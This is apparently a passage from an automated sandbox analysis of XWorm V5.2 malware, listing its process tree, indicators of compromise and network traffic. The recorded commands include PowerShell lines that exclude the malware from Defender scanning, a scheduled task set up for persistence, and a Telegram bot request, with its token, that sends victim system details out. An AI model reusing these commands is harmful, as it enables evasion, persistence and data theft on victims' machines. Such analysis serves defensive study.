SeIncBasePriorityPrivilege 4104 powershell.exe Token: SeCreatePagefilePrivilege 4104 powershell.exe Token: SeBackupPrivilege 4104 powershell.exe Token: SeRestorePrivilege 4104 powershell.exe Token: SeShutdownPrivilege 4104 powershell.exe Token: SeDebugPrivilege 4104 powershell.exe Token: SeSystemEnvironmentPrivilege 4104 powershell.exe Token: SeRemoteShutdownPrivilege 4104 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe 3320 taskmgr.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 3384 XClient.exe 4532 MicrosoftEdge.exe 416 MicrosoftEdgeCP.exe 2688 MicrosoftEdgeCP.exe 416 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3384 wrote to memory of 1884 3384 XClient.exe 75 PID 3384 wrote to memory of 1884 3384 XClient.exe 75 PID 3384 wrote to memory of 4384 3384 XClient.exe 78 PID 3384 wrote to memory of 4384 3384 XClient.exe 78 PID 3384 wrote to memory of 4104 3384 XClient.exe 81 PID 3384 wrote to memory of 4104 3384 XClient.exe 81 PID 3384 wrote to memory of 2076 3384 XClient.exe 83 PID 3384 wrote to memory of 2076 3384 XClient.exe 83 PID 3384 wrote to memory of 5008 3384 XClient.exe 85 PID 3384 wrote to memory of 5008 3384 XClient.exe 85 PID 1392 wrote to memory of 4500 1392 chrome.exe 92 PID 1392 wrote to memory of 4500 1392 chrome.exe 92 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 4280 1392 chrome.exe 94 PID 1392 wrote to memory of 1512 1392 chrome.exe 95 PID 1392 wrote to memory of 1512 1392 chrome.exe 95 PID 1392 wrote to memory of 1244 1392 chrome.exe 96 PID 1392 wrote to memory of 1244 1392 chrome.exe 96 PID 1392 wrote to memory of 1244 1392 chrome.exe 96 PID 1392 wrote to memory of 1244 1392 chrome.exe 96 PID 1392 wrote to memory of 1244 1392 chrome.exe 96 PID 1392 wrote to memory of 1244 1392 chrome.exe 96 PID 1392 wrote to memory of 1244 1392 chrome.exe 96 PID 1392 wrote to memory of 1244 1392 chrome.exe 96 PID 1392 wrote to memory of 1244 1392 chrome.exe 96 PID 1392 wrote to memory of 1244 1392 chrome.exe 96 PID 1392 wrote to memory of 1244 1392 chrome.exe 96 PID 1392 wrote to memory of 1244 1392 chrome.exe 96 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"1⤵
- Checks computer location settings
- Drops startup file
- Loads dropped DLL
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3384 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1884
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4384
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Client.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4104
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Client.exe'2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2076
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Client" /tr "C:\Users\Admin\AppData\Roaming\Client.exe"2⤵
- Creates scheduled task(s)
PID:5008
-
-
C:\Windows\SYSTEM32\CMD.EXE"CMD.EXE"2⤵PID:1376
-
-
C:\Windows\SYSTEM32\CMD.EXE"CMD.EXE"2⤵PID:2016
-
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3320
-
C:\Users\Admin\AppData\Roaming\Client.exeC:\Users\Admin\AppData\Roaming\Client.exe1⤵
- Executes dropped EXE
PID:4052
-
C:\Users\Admin\AppData\Roaming\Client.exeC:\Users\Admin\AppData\Roaming\Client.exe1⤵
- Executes dropped EXE
PID:2172
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of WriteProcessMemory
PID:1392 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffd3b829758,0x7ffd3b829768,0x7ffd3b8297782⤵PID:4500
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1660 --field-trial-handle=1792,i,2863708267257270816,2463140634777056532,131072 /prefetch:22⤵PID:4280
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1856 --field-trial-handle=1792,i,2863708267257270816,2463140634777056532,131072 /prefetch:82⤵PID:1512
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2100 --field-trial-handle=1792,i,2863708267257270816,2463140634777056532,131072 /prefetch:82⤵PID:1244
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2888 --field-trial-handle=1792,i,2863708267257270816,2463140634777056532,131072 /prefetch:12⤵PID:1400
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2892 --field-trial-handle=1792,i,2863708267257270816,2463140634777056532,131072 /prefetch:12⤵PID:5000
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3936 --field-trial-handle=1792,i,2863708267257270816,2463140634777056532,131072 /prefetch:12⤵PID:4384
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4568 --field-trial-handle=1792,i,2863708267257270816,2463140634777056532,131072 /prefetch:82⤵PID:3380
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4680 --field-trial-handle=1792,i,2863708267257270816,2463140634777056532,131072 /prefetch:82⤵PID:4052
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4692 --field-trial-handle=1792,i,2863708267257270816,2463140634777056532,131072 /prefetch:82⤵PID:720
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4924 --field-trial-handle=1792,i,2863708267257270816,2463140634777056532,131072 /prefetch:82⤵PID:1672
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1628 --field-trial-handle=1792,i,2863708267257270816,2463140634777056532,131072 /prefetch:22⤵PID:3020
-
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:4920
-
C:\Users\Admin\AppData\Roaming\Client.exeC:\Users\Admin\AppData\Roaming\Client.exe1⤵
- Executes dropped EXE
PID:4020
-
C:\Users\Admin\AppData\Roaming\Client.exeC:\Users\Admin\AppData\Roaming\Client.exe1⤵
- Executes dropped EXE
PID:1768
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4532
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:4756
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:416
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2688
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:3120
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵PID:3020
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:2184
-
C:\Users\Admin\AppData\Roaming\Client.exeC:\Users\Admin\AppData\Roaming\Client.exe1⤵
- Executes dropped EXE
PID:4124
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:4272
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:4304
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x3941⤵PID:1016
-
C:\Users\Admin\AppData\Roaming\Client.exeC:\Users\Admin\AppData\Roaming\Client.exe1⤵
- Executes dropped EXE
PID:2452
-
C:\Users\Admin\AppData\Roaming\Client.exeC:\Users\Admin\AppData\Roaming\Client.exe1⤵
- Executes dropped EXE
PID:1048
-
C:\Users\Admin\AppData\Roaming\Client.exeC:\Users\Admin\AppData\Roaming\Client.exe1⤵
- Executes dropped EXE
PID:308
-
C:\Users\Admin\AppData\Roaming\Client.exeC:\Users\Admin\AppData\Roaming\Client.exe1⤵
- Executes dropped EXE
PID:168
-
C:\Users\Admin\AppData\Roaming\Client.exeC:\Users\Admin\AppData\Roaming\Client.exe1⤵
- Executes dropped EXE
PID:4928
Network
-
Remote address:8.8.8.8:53Requestip-api.comIN AResponseip-api.comIN A208.95.112.1
-
Remote address:208.95.112.1:80RequestGET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
-
Remote address:8.8.8.8:53Request1.112.95.208.in-addr.arpaIN PTRResponse1.112.95.208.in-addr.arpaIN PTRip-apicom
-
Remote address:8.8.8.8:53Requestapi.telegram.orgIN AResponseapi.telegram.orgIN A149.154.167.220
-
GEThttps://api.telegram.org/bot7080511499:AAGFFOA3S2vvwmEy85SIMhKHrMsAdBoLR2Y/sendMessage?chat_id=@Xworm234_bot&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A48E03827559D164B317B%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20XWorm%20V5.2XClient.exeRemote address:149.154.167.220:443RequestGET /bot7080511499:AAGFFOA3S2vvwmEy85SIMhKHrMsAdBoLR2Y/sendMessage?chat_id=@Xworm234_bot&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A48E03827559D164B317B%0D%0A%0D%0AUserName%20:%20Admin%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Intel%20Core%20Processor%20(Broadwell)%0D%0AGPU%20:%20Microsoft%20Basic%20Display%20Adapter%20%0D%0ARAM%20:%20Error%0D%0AGroub%20:%20XWorm%20V5.2 HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
ResponseHTTP/1.1 400 Bad Request
Date: Fri, 26 Apr 2024 06:26:53 GMT
Content-Type: application/json
Content-Length: 73
Connection: keep-alive
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
-
Remote address:8.8.8.8:53Request220.167.154.149.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request220.167.154.149.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Requestphentermine-partial.gl.at.ply.ggIN AResponsephentermine-partial.gl.at.ply.ggIN A147.185.221.19
-
Remote address:8.8.8.8:53Requestphentermine-partial.gl.at.ply.ggIN A
-
Remote address:8.8.8.8:53Request19.221.185.147.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request19.221.185.147.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request19.221.185.147.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request28.173.189.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request28.173.189.20.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Requestwww.google.comIN AResponsewww.google.comIN A142.250.178.4
-
Remote address:142.250.178.4:443RequestGET /async/ddljson?async=ntp:2 HTTP/2.0
host: www.google.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:142.250.178.4:443RequestGET /async/newtab_promos HTTP/2.0
host: www.google.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:142.250.178.4:443RequestGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/2.0
host: www.google.com
x-client-data: COn8ygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:8.8.8.8:53Request67.204.58.216.in-addr.arpaIN PTRResponse67.204.58.216.in-addr.arpaIN PTRlhr48s49-in-f31e100net67.204.58.216.in-addr.arpaIN PTRlhr25s13-in-f67�G67.204.58.216.in-addr.arpaIN PTRlhr25s13-in-f3�G
-
Remote address:8.8.8.8:53Request67.204.58.216.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Request4.178.250.142.in-addr.arpaIN PTRResponse4.178.250.142.in-addr.arpaIN PTRlhr48s27-in-f41e100net
-
Remote address:8.8.8.8:53Requestapis.google.comIN AResponseapis.google.comIN CNAMEplus.l.google.complus.l.google.comIN A216.58.201.110
-
GEThttps://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SCWmpDDGjPk.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AAAC/rs=AHpOoo_Pl64J0IIHlj2zBtEJ3ZwdaJC3HA/cb=gapi.loaded_0chrome.exeRemote address:216.58.201.110:443RequestGET /_/scs/abc-static/_/js/k=gapi.gapi.en.SCWmpDDGjPk.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AAAC/rs=AHpOoo_Pl64J0IIHlj2zBtEJ3ZwdaJC3HA/cb=gapi.loaded_0 HTTP/2.0
host: apis.google.com
sec-ch-ua: "Chromium";v="106", "Google Chrome";v="106", "Not;A=Brand";v="99"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
-
Remote address:8.8.8.8:53Request110.201.58.216.in-addr.arpaIN PTRResponse110.201.58.216.in-addr.arpaIN PTRprg03s02-in-f141e100net110.201.58.216.in-addr.arpaIN PTRlhr48s48-in-f14�I110.201.58.216.in-addr.arpaIN PTRprg03s02-in-f110�I
-
Remote address:8.8.8.8:53Request249.197.17.2.in-addr.arpaIN PTRResponse249.197.17.2.in-addr.arpaIN PTRa2-17-197-249deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Requestwww.youtube.comIN AResponsewww.youtube.comIN CNAMEyoutube-ui.l.google.comyoutube-ui.l.google.comIN A172.217.169.14youtube-ui.l.google.comIN A216.58.212.206youtube-ui.l.google.comIN A172.217.169.78youtube-ui.l.google.comIN A172.217.169.46youtube-ui.l.google.comIN A142.250.179.238youtube-ui.l.google.comIN A142.250.180.14youtube-ui.l.google.comIN A142.250.187.206youtube-ui.l.google.comIN A142.250.187.238youtube-ui.l.google.comIN A142.250.178.14youtube-ui.l.google.comIN A172.217.16.238youtube-ui.l.google.comIN A142.250.200.14youtube-ui.l.google.comIN A142.250.200.46youtube-ui.l.google.comIN A216.58.201.110youtube-ui.l.google.comIN A216.58.204.78youtube-ui.l.google.comIN A216.58.213.14
-
Remote address:172.217.169.14:443RequestGET /watch?v=dQw4w9WgXcQ HTTP/2.0
host: www.youtube.com
accept: text/html, application/xhtml+xml, image/jxr, */*
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br
ResponseHTTP/2.0 200
x-content-type-options: nosniff
cache-control: no-cache, no-store, max-age=0, must-revalidate
pragma: no-cache
expires: Mon, 01 Jan 1990 00:00:00 GMT
date: Fri, 26 Apr 2024 06:30:45 GMT
x-frame-options: SAMEORIGIN
strict-transport-security: max-age=31536000
origin-trial: AmhMBR6zCLzDDxpW+HfpP67BqwIknWnyMOXOQGfzYswFmJe+fgaI6XZgAzcxOrzNtP7hEDsOo1jdjFnVr2IdxQ4AAAB4eyJvcmlnaW4iOiJodHRwczovL3lvdXR1YmUuY29tOjQ0MyIsImZlYXR1cmUiOiJXZWJWaWV3WFJlcXVlc3RlZFdpdGhEZXByZWNhdGlvbiIsImV4cGlyeSI6MTc1ODA2NzE5OSwiaXNTdWJkb21haW4iOnRydWV9
permissions-policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factor=*, ch-ua-platform=*, ch-ua-platform-version=*
cross-origin-opener-policy: same-origin-allow-popups; report-to="youtube_main"
report-to: {"group":"youtube_main","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/youtube_main"}]}
